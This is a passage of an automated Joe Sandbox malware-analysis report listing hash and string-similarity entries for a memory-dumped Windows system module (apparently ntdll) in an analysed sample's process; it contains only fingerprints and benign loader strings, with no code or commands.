                                                        • Opcode ID: f65e734654a58af6546a789e4b6eb35786662030d4e10e3a43ef6b371b45a2d5
                                                        • Instruction ID: 7d2ba51bfc71a403070ab72fb18ee3547bb1dc400bb7a85b5bfd26344d6b306c
                                                        • Opcode Fuzzy Hash: f65e734654a58af6546a789e4b6eb35786662030d4e10e3a43ef6b371b45a2d5
                                                        • Instruction Fuzzy Hash: DD31CE35202B1AEFE741CF24D980B99BBA9FF58368F404229E90047A50DB76E920CFD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$$
                                                        • API String ID: 3446177414-233714265
                                                        • Opcode ID: 03d9c8380a334d9b874f7a2ab3ea42302c879f702f87a8663df074edc3c3a868
                                                        • Instruction ID: d23ed6bf426eaaa323ee0f251fb96ad640bdd9830a3e299d71d4f9411bbe10bf
                                                        • Opcode Fuzzy Hash: 03d9c8380a334d9b874f7a2ab3ea42302c879f702f87a8663df074edc3c3a868
                                                        • Instruction Fuzzy Hash: BE61ED71A14749DFEB20CFA4C580BADB7B6FF4472CF004269D915AB641CB78AA45CF82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                        • API String ID: 0-118005554
                                                        • Opcode ID: eeac5a85c9ac1340d6d282b0f2da7cc4bb42916b54b1326f06da396e169d845c
                                                        • Instruction ID: b291ad58d08275900723762b00ce60b967d3e3c5ac8cc90271842c7b7ceeb3d6
                                                        • Opcode Fuzzy Hash: eeac5a85c9ac1340d6d282b0f2da7cc4bb42916b54b1326f06da396e169d845c
                                                        • Instruction Fuzzy Hash: 6A31E375219B41ABD301CB29D445B1EB3E8EF8C768F020A59F858CB391EB34E805CB52
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local\$@
                                                        • API String ID: 0-380025441
                                                        • Opcode ID: 6e1d5a664f6ad96d27243da71c2974a9e7acbd908149dc1c8744f3920e62b7e4
                                                        • Instruction ID: fdb97afa4dcde83554df76815be2c6068cd71d1272eb349e3e477903cc1039d3
                                                        • Opcode Fuzzy Hash: 6e1d5a664f6ad96d27243da71c2974a9e7acbd908149dc1c8744f3920e62b7e4
                                                        • Instruction Fuzzy Hash: EE31747650D7099FD311DF28C481A5BBBE8FB8D698F800B2EF59487251DA34DE04DB92
                                                        Strings
                                                        • RtlpInitializeAssemblyStorageMap, xrefs: 37962A90
                                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 37962A95
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                        • API String ID: 0-2653619699
                                                        • Opcode ID: 6cada256cbccf1e360f383c8c00a2526ac2798af3e708940883c2bd8f3583a0c
                                                        • Instruction ID: 9c113cadb8b22dc7a5f0650d9ade2dd203917818f6a12dea152a12f33aa3f2a0
                                                        • Opcode Fuzzy Hash: 6cada256cbccf1e360f383c8c00a2526ac2798af3e708940883c2bd8f3583a0c
                                                        • Instruction Fuzzy Hash: AD115C72B00208FFE7259B488D45F6B72AD9B98B7CF148269B900EB284D6B8DD009690
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: c5db948dc88510f8acfa814909d8e4cc7e2103da5c73234e8f6e930c2c364df1
                                                        • Instruction ID: cd7e6a7de7249f929fe0efc5c21044a4b1f92503e9ab9a97eb25b679d35f207d
                                                        • Opcode Fuzzy Hash: c5db948dc88510f8acfa814909d8e4cc7e2103da5c73234e8f6e930c2c364df1
                                                        • Instruction Fuzzy Hash: D1B112B5909341CFD354CF28C880A6ABBF1BB88318F584A6EF899C7352D735E945CB42
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8bd18cc9364b2fbb3489883437a108558f681895214e55b10e8d0738e9d13574
                                                        • Instruction ID: e97252049c34c5cd257222399aa5f72412995ed52814d7ab05086345bea00542
                                                        • Opcode Fuzzy Hash: 8bd18cc9364b2fbb3489883437a108558f681895214e55b10e8d0738e9d13574
                                                        • Instruction Fuzzy Hash: 8EA18D75608342CFE310CF28D480A1ABBE6FFA8354F604A6DE5859B351EB35E945CF92
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46a038df0144510f601273a36d57992da0b9d2a279a6253cd9df7f19d9812cd1
                                                        • Instruction ID: 5f3362eb2ff82797bbb5c1694572aac81cdaf0c317f89477746ec4b658baec2d
                                                        • Opcode Fuzzy Hash: 46a038df0144510f601273a36d57992da0b9d2a279a6253cd9df7f19d9812cd1
                                                        • Instruction Fuzzy Hash: D9619074A10606EFEB08CF68D480BADFBB6BF98254F14826ED419A7300DB35A941CF95
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a21f604c28a63319bda04d7c3e1ad3d2d31ef45a2301e16176b554b562142ed7
                                                        • Instruction ID: 220ddaa7da278b5cfbb895139e32dce171d9d557edccc9884b80666b793120c6
                                                        • Opcode Fuzzy Hash: a21f604c28a63319bda04d7c3e1ad3d2d31ef45a2301e16176b554b562142ed7
                                                        • Instruction Fuzzy Hash: 6B416CB4D0128CEFDB10DFA9C880AADBBF9FB48354F50822ED458A7611D734A901CF64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: fde7c1e52795f143e393ffbce26aecdec70da3618178f6a221f2c8baa36ed882
                                                        • Instruction ID: 6f0674e0463d3858010c37c5565857d35e35188fb8e57fdfe643090e86741d57
                                                        • Opcode Fuzzy Hash: fde7c1e52795f143e393ffbce26aecdec70da3618178f6a221f2c8baa36ed882
                                                        • Instruction Fuzzy Hash: 31310072512604AFD311CF18C880E6A7BA9FF96768F504269EC549B6A1DB31ED42CFD0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: bc8844897f91495e5a6265b59ebe0be80dce46209cdbd990f1ede6f04918855d
                                                        • Instruction ID: 8379ffb20d7840b4c775b3423b4913d7b40f09d545513f2c1fd3c65a2bbe68f2
                                                        • Opcode Fuzzy Hash: bc8844897f91495e5a6265b59ebe0be80dce46209cdbd990f1ede6f04918855d
                                                        • Instruction Fuzzy Hash: B131A035615A0AFFE741CB24DA40E5ABBA5FF58364F445129E90087B51DB36E830CB81
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 58cd6e20228fcac251d040296ea886e4eace78e8645c5c33c033d144c09d4d32
                                                        • Instruction ID: 50e4c1a44c273a66359f2f8d85ef11b2315be5cd9d6b1c18e839857082d94428
                                                        • Opcode Fuzzy Hash: 58cd6e20228fcac251d040296ea886e4eace78e8645c5c33c033d144c09d4d32
                                                        • Instruction Fuzzy Hash: 102146751153509FE7228F04D944B1ABBA5FF89B28F42066CE9400BF51CB3AE884CF83
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: b2b70d9a47778043cfb7209456bb52fe8334663c214b51fc25593542a238cadc
                                                        • Instruction ID: 818fbdcd79893978ab05e7e7c5bd07888115af00cd2f2d6cc1b9fe9813846444
                                                        • Opcode Fuzzy Hash: b2b70d9a47778043cfb7209456bb52fe8334663c214b51fc25593542a238cadc
                                                        • Instruction Fuzzy Hash: 4AF0F032100740AFD331DB09CC04F8ABBEDEF95710F08011CA98293490C7A4B906CB51
                                                        Strings
                                                        • System Volume Information, xrefs: 3799DEBE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: System Volume Information
                                                        • API String ID: 0-764423717
                                                        • Opcode ID: f38364bd9362913e2a012313bea50d48d476b99748c46e2f25492781e539c4bf
                                                        • Instruction ID: 14d884040abeec33648e805a95e2a62a81ef57b9c90f1056fa57fbda2dcd6975
                                                        • Opcode Fuzzy Hash: f38364bd9362913e2a012313bea50d48d476b99748c46e2f25492781e539c4bf
                                                        • Instruction Fuzzy Hash: 8A617E71118305AFE321DF54C881EABB7E9EF98758F000A2DF9849B261D774DD54CB92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                        • Instruction ID: 13f39c81fe0435270a9077f36d443bd60d40b9be6d37448d46e856371714e4e4
                                                        • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                        • Instruction Fuzzy Hash: E7615DB5D11319AFEB11CFA9D840BAEBBB8FF94764F104229E810FB250D7759A01CB61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                        • Instruction ID: ebc9872ea718b506045130bc01ec74b5dce1200dbe865d11cd5d25411027b719
                                                        • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                        • Instruction Fuzzy Hash: 9D51AEB2514745EFE7118F54C840F6BB7E9FF88768F400A29B990AB290D7B4ED05CB92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                        • Instruction ID: 56fe4ca9c6f4b990204ce0c2dfe8c73ea1e7447142962d287928aed680b4fdc8
                                                        • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                        • Instruction Fuzzy Hash: 2B51AF715057149FD321CF15C841A6BB7F8FF88718F004A2EF9958B6A0E7B4E954CB92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PreferredUILanguages
                                                        • API String ID: 0-1884656846
                                                        • Opcode ID: 9f4eb9d8aed614edcca8ec12792fa48eaa4a76ec427a81835bf268bc50c02619
                                                        • Instruction ID: d6230ca1fabb0d2262f4056afaf8a001168a3b9c52a748a7760e211d84c3b5db
                                                        • Opcode Fuzzy Hash: 9f4eb9d8aed614edcca8ec12792fa48eaa4a76ec427a81835bf268bc50c02619
                                                        • Instruction Fuzzy Hash: C3410276D12219ABDF11CA94C850BEEB7BDEF44768F010366E815BB650DA74EE40CFA0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: verifier.dll
                                                        • API String ID: 0-3265496382
                                                        • Opcode ID: 5aecbbc6c830ad76e04a8435f97b7413a83365de40bc3b56fa019062d8fa3dde
                                                        • Instruction ID: 16c859533214fb8319b0413eddf5accf6e524bbf0cfc736c87ca5d494493951c
                                                        • Opcode Fuzzy Hash: 5aecbbc6c830ad76e04a8435f97b7413a83365de40bc3b56fa019062d8fa3dde
                                                        • Instruction Fuzzy Hash: DC31C5F5B10341AFE7148F289851B6677EDEF48378F90827AE544DF381E6359C818790
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #
                                                        • API String ID: 0-1885708031
                                                        • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                        • Instruction ID: f55e5ffb8a83a2a6d3e0e3a161a8cc9407f9263bdc62f469025208264107689f
                                                        • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                        • Instruction Fuzzy Hash: 8F41C37990061ADFDB11DF84C850FBEB3B5EF44759F00425DE941A7214DB34D941DBA1
                                                        Strings
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 378F0058
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                        • API String ID: 0-996340685
                                                        • Opcode ID: fa9742dea8b36da5e83b72c71c4bf044954b931c60c89376f09f13bce4240262
                                                        • Instruction ID: 650a83e5b486b63daaea71fdb3252365dd5826a8fa346a06f8c8177321ae0213
                                                        • Opcode Fuzzy Hash: fa9742dea8b36da5e83b72c71c4bf044954b931c60c89376f09f13bce4240262
                                                        • Instruction Fuzzy Hash: 03417D79A0074A9ED724DFB4D440AEBB7F8BF59350F10492ED5AAC3240E735A544CBA2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Flst
                                                        • API String ID: 0-2374792617
                                                        • Opcode ID: 55beb8f5b3d775fe002cf651af3f63ead434a174930bfb72632a7c24ba33a1fd
                                                        • Instruction ID: d16b4f7d8e5b3f16e34a049cb1191d91a47ef9b714aed06e32ce17c03f0192da
                                                        • Opcode Fuzzy Hash: 55beb8f5b3d775fe002cf651af3f63ead434a174930bfb72632a7c24ba33a1fd
                                                        • Instruction Fuzzy Hash: 9D4198B52053059FD714EF28C484A16FBE8EB4E728F50826EE4488F345EB75E942CB92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: L4CwL4Cw
                                                        • API String ID: 3446177414-1654103815
                                                        • Opcode ID: 05bffd7ad1b98adc747b9204984c8e2bc15262aaf7a6f6993b4a51777b18f5ea
                                                        • Instruction ID: ff1e3954befdc4197d47daac1b548b018b54e9a80315222693b6cef26ad89b45
                                                        • Opcode Fuzzy Hash: 05bffd7ad1b98adc747b9204984c8e2bc15262aaf7a6f6993b4a51777b18f5ea
                                                        • Instruction Fuzzy Hash: 9221D376900714AFD3228F18C800B1A77BDFB8A768F120579E5949BB51DB74E806CF92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx
                                                        • API String ID: 0-89312691
                                                        • Opcode ID: 3173ce6746cfedda7c07fe94ecac9f2b58983b82b2a72cae7860578e22011577
                                                        • Instruction ID: 3339b9c5e82de12403c9e15f0fa98fb73c903da48bcec5b44b0b5366b768a479
                                                        • Opcode Fuzzy Hash: 3173ce6746cfedda7c07fe94ecac9f2b58983b82b2a72cae7860578e22011577
                                                        • Instruction Fuzzy Hash: CC115E7530BB1A8FF7144D19A850766B395EBF5274F70852AE451CB391FE73E8818780
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrCreateEnclave
                                                        • API String ID: 0-3262589265
                                                        • Opcode ID: 9a2631add7fe3a711488266ff3ad074b663c6efa6dc49451fa39d3c8903fb15c
